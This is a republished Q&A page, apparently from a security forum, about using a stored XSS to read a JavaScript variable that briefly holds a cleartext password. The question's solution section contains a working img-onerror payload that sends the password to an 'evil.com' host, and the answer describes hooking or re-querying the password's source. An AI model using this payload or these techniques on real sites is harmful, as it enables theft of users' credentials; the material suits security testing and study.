Access to a js variable which visible for a brief period of time via XSS Code Answer

Hello Developer, Hope you guys are doing great. Today at Tutorial Guruji Official website, we are sharing the answer of Access to a js variable which visible for a brief period of time via XSS without wasting too much if your time.

The question is published on by Tutorial Guruji team.

If I put a breakpoint on a Javascript function when I visit a web page and I examine a JS variable that variable contains the cleartext password just for a brief period of time.

I found an XSS and I want to access to the content of that variable I’m trying the following

var i; for(i=1;i<10000;i++){
     if(typeof cleartext_password !== 'undefined')
         { cleartext_password;}
}

Anyway it seems the loop doesn’t iterate, I just see in the console 4 “undefined reference” errors.

What am I missing?

SOLUTION

I opted for the clean solution as suggested by CBHacking in his answer. The password was stored in clear within the DOM. I was able to leverage a stored XSS to exfiltrate the password as follows:

<img src=x onerror="this.onerror=null;this.src='http://evil.com?mmmh='+window.vuln_name.clear_textpassword>

Answer

The obvious answers:

  • a loop that tight, with only 10k iterations, will complete in milliseconds at most, assuming it’s not optimized out entirely (since state never changes within it, that would be a fair thing for the optimizer to do)
  • if cleartext_password isn’t in scope for your little loop then it will never have any value to read; your breakpointed function’s local variables are probably not accessible from your XSS payload
  • JS is single-threaded and doesn’t preempt other code; your loop and the function that temporarily populates the variable will never execute at the same time, or even interleave execution (neither can start until the other finishes)

The ugly-hack solution: write your own version of the relevant JS function (the one you’re breakpointing) with extra code that dumps the password to somewhere persistent, and/or remove the delete call (if there is one) that erases the variable. Replace the legit function with your modified version (this might require additionally replacing functions that create / define the breakpointed code, depending on how that function is defined and whether it’s stored in a visible variable).

The actually good solution: read the function you’re breakpointing to see where the cleartext_password variable gets set, and where the function gets its value from (obvious candidates are the DOM, local storage, or an XHR/fetch call to the server). Just execute the same operation (DOM lookup, local storage read, XHR/fetch request, etc.) to retrieve the value directly.

We are here to answer your question about Access to a js variable which visible for a brief period of time via XSS - If you find the proper solution, please don't forgot to share this with your team members.

Related Posts

Tutorial Guruji